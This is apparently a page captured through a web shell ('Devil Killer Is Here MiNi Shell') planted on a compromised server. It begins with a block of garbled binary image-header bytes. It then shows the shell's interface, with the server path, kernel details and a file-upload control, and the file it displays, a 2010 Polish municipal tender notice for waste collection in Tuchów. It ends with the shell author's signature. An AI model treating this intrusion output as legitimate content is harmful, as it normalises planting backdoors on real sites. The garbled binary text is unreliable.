JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100126/22358-N-2010.html

<p class="kh_header"><b>Tuchów: Odbiór odpadów komunalnych pochodzących z obiektów mienia komunalnego i z terenów objętych oczyszczaniem miasta Tuchowa</b><br>
<b>Numer ogłoszenia: 22358 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.tuchow.BIP Tuchow /Zamówienia  publiczne+ogłoszenia/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych pochodzących z obiektów mienia komunalnego i z terenów objętych oczyszczaniem miasta Tuchowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem wykonania są:

Usługi odbioru odpadów komunalnych z obiektów mienia komunalnego i terenów objętych oczyszczaniem miasta.

1.Odpady powstałe w budynkach  gromadzone będą w pojemnikach o pojemnościach 0,11m3, 1,0m3, oraz  w workach o pojemnościach 100-120l. Wykaz budynków objętych wywozem wraz z podaniem częstotliwości odbioru stanowi załącznik nr 1 do niniejszej specyfikacji.
2.Odpady pochodzące z terenów objętych oczyszczaniem miasta gromadzone będą w koszach ulicznych, oraz workach o pojemności 100-120 l.
3.Wykonawca przejmie odpady i zdeponuje je na składowisku poza Gminą Tuchów.
Do faktur obciążających  Zamawiającego  za odbiór odpadów będą wymagane potwierdzenia o ilości zdeponowanych na składowisku odpadów sporządzone na obowiązujących drukach kart przekazania odpadów.
4.Przewidywana łączna ilość odpadów zebranych w okresie trwania zamówienia wynosi ok. 4 152,00 m3.

Usługą odbioru odpadów komulanych objęte są poniżej zestawione obiekty i miejsca: 

1.Ratusz  Tuchów ul. Rynek 1 - 1 x tydzień  - worki 120l,
2.Budynek Administracyjny  Tuchów ul. Jana Pawła II - 1x tydzień- worki 120l,
3.Tuchów os. Reymonta -2 x tydzień ,kontenery 1m3 (4 szt.)
4.Tuchów os. Wołowa blok 1A- 1 x tydzień, kontener 1m3 (1szt.)
5.Tuchów os .Wołowa blok 1D- 1 x tydzień, pojemniki 0,11m3 (4 szt.)
6.Lubaszowa budynek wielofunkcyjny 2x miesiąc, pojemniki 0,11m3 (1szt.)
7.Jodłówka Tuchowska budynek wielofunkcyjny 2x miesiąc, pojemnik 0,11m3 (1 szt.)
8.Karwodrza Remiza OSP- 2 x miesiąc ,pojemnik 0,11m3 (1 szt.)
9.Piotrkowice Remiza OSP- 2 x miesiąc, pojemnik 0,11m3 ( 1 szt.)  
10. Kosze uliczne -1 x tydzień ,  0,03m3 ( ok. 30 szt.)
11. Odpady z placu targowego -1 x tydzień (worki ,kartony ,luz)
12.Odpady z cmentarza w Tuchowie- 3x tydzień  pojemnik 1m3(1szt.)
13.Jodłówka Tuchowska platforma widokowa - 1 x miesiąc ,worki 120 l
14.Łowczów Remiza OSP- 2 x miesiąc kontener 1 m3(1 szt)
15.Burzyn Dom Kultuty - 2 x miesiac,kontener 1 m3 (1 szt)
16.Siedliska budynek wielofunkcyjny-2 x miesiąc,kontener 1m3 (1 szt).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki  udziału  w  postępowaniu, oraz  opis  sposobu dokonywania  oceny  spełnienia  tych  warunków: 

O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy:

A. Posiadają  uprawnienia  do wykonania określonej  działalności  lub  czynności jeżeli  przepisy  prawa  nakładają  obowiązek  ich  posiadania. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania  w obrocie prawnym, oraz  będzie  posiadał  uprawnienia  do  odbioru  odpadów  komunalnych, oraz  ich  transportu  na  koncesjonowane  wysypisko  śmieci.

Ocena  tego warunku będzie dokonana  na  podstawie:

- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;
- aktualnej umowy o gotowości przyjęcia odpadów przez przedsiębiorcę prowadzącego działalność w zakresie unieszkodliwiania odpadów wraz z dokładnym adresem miejsca unieszkodliwiania,
- aktualnego zezwolenia Burmistrza Tuchowa  na  odbiór i transport odpadów  komunalnych i podobnych do komunalnych.

B. Posiadają wiedzę i doświadczenie  oraz  dysponują  odpowiednim  potencjałem  technicznym  i  osobami  zdolnymi  do  wykonania  zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia:

a/ w  zakresie  wymaganego  doświadczenia - Zamawiający wymaga aby  aby Wykonawca wykazał się co najmniej  jedną usługą o wartości  nie mniejszej niż 150 000 PLN brutto polegającej na wywozie odpadów komunalnych  i  podobnych  do  komunalnych

Ocena tego warunku zostanie dokonana na podstawie:

- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem  dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - załącznik nr 3 SIWZ,
- złożonych referencji potwierdzających należyte wykonanie usług o których mowa w powyższym wykazie. 

b/  w  zakresie   dysponowania  odpowiednim  potencjałem  technicznym   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował  środkiem transportu  odpowiednim do przewozu odpadów komunalnych  tj. pojazdem zarejestrowanym do przewozu odpadów - typu śmieciarka  w ilości co najmniej 1 szt.  

Ocena tego warunku będzie dokonana w oparciu o:

- wykaz  środków transportu jakimi dysponuje Wykonawca, odpowiedniego do realizacji zamówienia  wraz  z informacją  o podstawie dysponowania tymi zasobami - załącznik nr 4 SIWZ

W  przypadku  nie  posiadania  potencjału  technicznego,  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego    do  wykonania  zamówienia. 

c/  w  zakresie   dysponowania osobami  zdolnymi   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował  odpowiednią  kadra  techniczną:

Ocena tego warunku będzie dokonana w oparciu o:

- oświadczenia, że wykonawca dysponuje osobami  zdolnymi  do  realizacji  zamówienia  posiadającymi  wymagane  kwalifikacje  techniczne  i  aktualne  badania  lekarskie, złożonego w dokumencie o nazwie oświadczenie  załącznik nr  2  SIWZ

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia,  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia. 

C/ Znajdują się w sytuacji ekonomicznej i finansowej Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia na  kwotę  nie  mniejszą  niż  150 000 PLN, oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej.

Ocena tego warunku będzie dokonana na podstawie: 

- opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
- oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie o nazwie oświadczenie - załącznik nr 2  SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz  oświadczeń jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:
Każdy  Wykonawca  przystępujący do przetargu  winien złożyć oświadczenie, że:

1.posiada  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy  prawa  nakładają obowiązek posiadania takich uprawnień;

2.posiada  wiedzę i  doświadczenie 

3.dysponuje  odpowiednim  potencjałem technicznym  oraz  osobami zdolnymi do  wykonania zamówienia, 

4.znajduję się  w sytuacji ekonomicznej i finansowej

Ponadto  Zamawiający  żąda  złożenia  oświadczenia, że  wykonawca:

- nie  posiada  podstaw do wykluczenia  z  powodu  nie  spełnienia  warunków  o  których  mowa  w art. 24  ust. 1, oraz  art. 24  ust. 2 pkt. 1 uPzp,

- w przypadku wyboru  oferty  podpisze  umowę, której  projekt  załączono do specyfikacji istotnych warunków zamówienia w terminie i czasie wskazanym przez Zamawiającego,

- realizując  zamówienie  publiczne  w  ciągu  ostatnich  3  lat  przed  wszczęciem  postępowania  nie  wyrządził szkody, nie  wykonując  zamówienia  lub  wykonując  je  z  nienależytą  starannością,

- wszyscy  pracownicy  skierowani  do  realizacji  zamówienia  będą  posiadać  wymagane  kwalifikacje  techniczne  i  aktualne  badania  lekarskie.

- po zapoznaniu się z wszystkimi warunkami zamówienia, projektem umowy i załącznikami  akceptują je bez zastrzeżeń

Wykaz  dokumentów jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:

Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 2 ustawy, przedstawienie wymienionych niżej dokumentów. 
Dokumenty te, zgodnie  z obowiązującym w tym zakresie Rozporządzeniem Prezesa  Rady  Ministrów   z dnia  31 grudnia 2009 r. /Dz. U. z  30  grudnia 2009 r. Nr 226, poz. 1817./, winny  być  aktualne  w  terminie  składania  ofert  i   mogą być przedstawione w formie  oryginałów  lub  poświadczonych  kopii  za  zgodność  z  oryginałem. 
Potwierdzenie zgodności należy dokonać na każdej stronie dokumentu.

W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty :

- aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania  wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;

- wykaz oświadczeń, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1  i  że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 uPzp - zgodnych z treścią  załącznika  nr 2 SIWZ.

- aktualnej umowy o gotowości przyjęcia odpadów przez przedsiębiorcę prowadzącego działalność w zakresie  unieszkodliwiania odpadów wraz z dokładnym adresem miejsca unieszkodliwiania,

- aktualnego zezwolenia /Burmistrza, Wójta lub Starosty/ na zbieranie i transport odpadów  komunalnych i podobnych do komunalnych.

W  przypadku  występowania  pełnomocnika  należy  dołączyć  pełnomocnictwo  dla osób  podpisujących  ofertę  do podejmowania  zobowiązań  w  imieniu  firmy składającej  ofertę, o  ile  nie  wynikają  z  przepisów  prawa lub innych  dokumentów

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  wymaganego  doświadczenia  i  potencjału  ludzkiego  oraz  zdolności  finansowej, Zamawiający  dopuszcza  możliwość  sumowania  potencjałów  wszystkich  wykonawców  wspólnie  ubiegających  się  o  zamówienie.

Ponadto w  przypadku  Wykonawców   wspólnie  ubiegających się  o zamówienie, wykonawcy  ustanawiają  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  reprezentowania    ich  w  postępowaniu  i  zawarcia  umowy  w sprawie  zamówienia  publicznego.

W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę/y nie  wymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne  pełnomocnictwo. 
Pełnomocnictwo powinno być przedłożone w formie oryginału  lub  notarialnie  potwierdzonej  kopii. 

Opłata skarbowa powinna być odprowadzona zgodnie z Rozporządzeniem Ministra Finansów z dnia 5 grudnia 2000 r.  w sprawie pobierania zapłaty i zwrotu opłaty skarbowej oraz sposobu prowadzenia rejestrów tej opłaty .

Jeżeli  oferta  wykonawców  o  których  mowa  w  art. 23  ust. 1  uPzp  zostanie  wybrana, Zamawiający  przed  podpisaniem  umowy  w  sprawie  zamówienia  publicznego  zażąda  przedstawienia  umowy  regulującej   współpracę  podmiotów  występujących  wspólnie.    

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia innych podmiotów,  jeżeli  w  sporządzonym  wykazie  na  załączniku  do  SIWZ   wykonawca  wskazał osoby, którymi będzie  dysponował

- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed  upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców

- wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami;  

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  niezbędnych do  wykonania  zamówienia pojazdów  i urządzeń , jeżeli  w  sporządzonym wykazie  na  załączniku  do  SIWZ , wykonawca  wskazał pojazdy i  urządzenia  techniczne, którymi  będzie  dysponował

- oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
       
- polisy  lub  innego  dokumentu  ubezpieczenia  potwierdzającego, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  

Załączniki  do  formularza  ofertowego, będące  częścią  oferty, muszą  być  podpisane  bądź  przez  ww. osoby, bądź  przez  upoważnionego  Wykonawcę, w  tym  przypadku  upoważnienie  do  podpisania  dokumentów  musi  być  bezwzględnie  dołączone  do  oferty.

Brak  jakichkolwiek z  wyżej  wymienionych  dokumentów, lub  złożenie  dokumentu  w  niewłaściwej  formie  np.  nie  poświadczenie którejkolwiek  strony  dokumentu  przez  wykonawcę  za  zgodność  z  oryginałem,    odpisy  lub  kopie, stwierdzenia  braku  podpisów  bądź  upoważnienia  do  podpisywania  dokumentów, Wykonawca  zostanie  wykluczony i  spowoduje  odrzucenie  oferty.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 2 ust. 1  Rozporządzenia:

1) pkt 2-4 i pkt 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;

2) pkt 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, Rozporządzenia  powinny być wystawione nie wcześniej  niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego
odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.

4. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.

Dokumenty, o których mowa powyżej należy złożyć w formie oryginału, odpisu, wypisu lub kopii, przetłumaczone na język polski, poświadczonych przez polskie placówki konsularne, stosownie do obowiązujących przepisów.

Dokumenty są składane w oryginale lub kopii  poświadczonej za zgodność  z oryginałem przez wykonawców. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawców bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w § 1 ust. 2 i 3  Rozporządzenia, kopie dokumentów  dotyczących odpowiednio wykonawcy lub tych podmiotów   są poświadczane  za zgodność z oryginałem przez wykonawców lub te podmioty.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli Zamawiający wyraził zgodę o której mowa w art. 9 ust. 3 uPzp.

Zamawiający zastrzega  sobie, że  zażąda przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona kopia dokumentu jest nieczytelna lub  budzi wątpliwości co do jej prawdziwości.
 
Ocena  spełnienia  warunków  wymaganych  od  wykonawców  zostanie  dokonana  wg.  formuły /spełnia - nie spełnia/	 

Nie  spełnienie  chociażby  jednego  warunku  w  pkt .  15    SIWZ  będzie  skutkować   wykluczeniem  wykonawcy  i odrzuceniem  oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow /Zamówienia  publiczne+ogłoszenia/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1. Cena materiałow jest bezpłatna..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 11:00, miejsce: Urząd Miejski w Tuchowie, 33 - 170 Tuchów ul. Rynek 1, pokój nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com